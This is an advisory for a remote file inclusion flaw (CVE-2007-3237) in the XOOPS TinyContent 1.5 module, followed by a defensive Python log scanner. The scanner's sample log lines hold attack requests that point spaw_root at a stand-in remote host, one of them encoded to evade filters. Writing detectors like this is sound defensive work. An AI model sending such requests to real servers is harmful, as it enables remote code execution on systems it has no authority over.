Xoops · Tinycontent · CVE-2007-3237
Name of the Vulnerable Software and Affected Versions:
TinyContent module for XOOPS version 1.5
Description:
A remote file inclusion issue in the TinyContent 1.5 module for XOOPS allows remote attackers to execute arbitrary PHP code via a URL in the `spaw_root` parameter in the `admin/spaw/spaw_control.class.php` file.
Recommendations:
For TinyContent module version 1.5, consider restricting access to the `spaw_control.class.php` file to minimize the risk of exploitation. Avoid using the `spaw_root` parameter in requests to the affected file until the issue is resolved. At the moment, there is no information about a newer version that contains a fix for this vulnerability.
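Added example (not part of the original advisory or of the TinyContent code): until access to the file is restricted, web server access logs can be checked for requests that reach `admin/spaw/spaw_control.class.php` and for `spaw_root` values that carry a URL. The function names, the Apache combined log format and the sample log lines are assumptions made for this illustration.

```python
import re
from urllib.parse import parse_qsl, unquote

VULN_SCRIPT = "/admin/spaw/spaw_control.class.php"   # path from the advisory
PARAM = "spaw_root"                                  # parameter from the advisory
# Value that begins with a scheme ("http:", "ftp:", ...), "//" or a UNC prefix.
REMOTE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*:|//|\\\\)", re.I)
REQUEST = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def fully_unquote(value, rounds=3):
    """Strip repeated layers of percent-encoding before matching."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return a finding dict for a request that reaches the script, else None."""
    m = REQUEST.match(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    path = re.sub(r"/+", "/", fully_unquote(path)).lower()
    if not path.endswith(VULN_SCRIPT):
        return None
    # Assumption: nothing legitimate requests this include file directly,
    # so every hit is reported at least at "review" level.
    finding = {"ip": m.group("ip"), "status": int(m.group("status")),
               "level": "review", "value": None}
    for key, value in parse_qsl(query, keep_blank_values=True):
        # PHP maps '.' and ' ' in parameter names to '_'; normalise likewise.
        name = re.sub(r"[ .]", "_", fully_unquote(key))
        if name == PARAM:
            finding["value"] = fully_unquote(value)
            if REMOTE.match(finding["value"]):
                finding["level"] = "alert"
    return finding

def scan(lines):
    return [f for f in map(classify, lines) if f]

# Constructed sample log lines (documentation addresses, .invalid host names).
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Jun/2007:10:01:22 +0000] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://files.example.invalid/x HTTP/1.1" 200 512',
    '203.0.113.7 - - [12/Jun/2007:10:01:25 +0000] "GET /modules/tinycontent/admin/spaw/SPAW_control.class.php?spaw%2Eroot=hTTp%253A%252F%252Ffiles.example.invalid%252Fx HTTP/1.1" 200 512',
    '198.51.100.4 - - [12/Jun/2007:10:02:00 +0000] "GET /modules/tinycontent/index.php?id=3 HTTP/1.1" 200 4096',
    '198.51.100.9 - - [12/Jun/2007:10:03:10 +0000] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php HTTP/1.1" 403 199',
]
```

`scan(SAMPLE_LOG)` returns three findings: two at "alert" level and one "review" entry for the direct request answered with 403. A 403 on such requests is what the access restriction recommended above should produce.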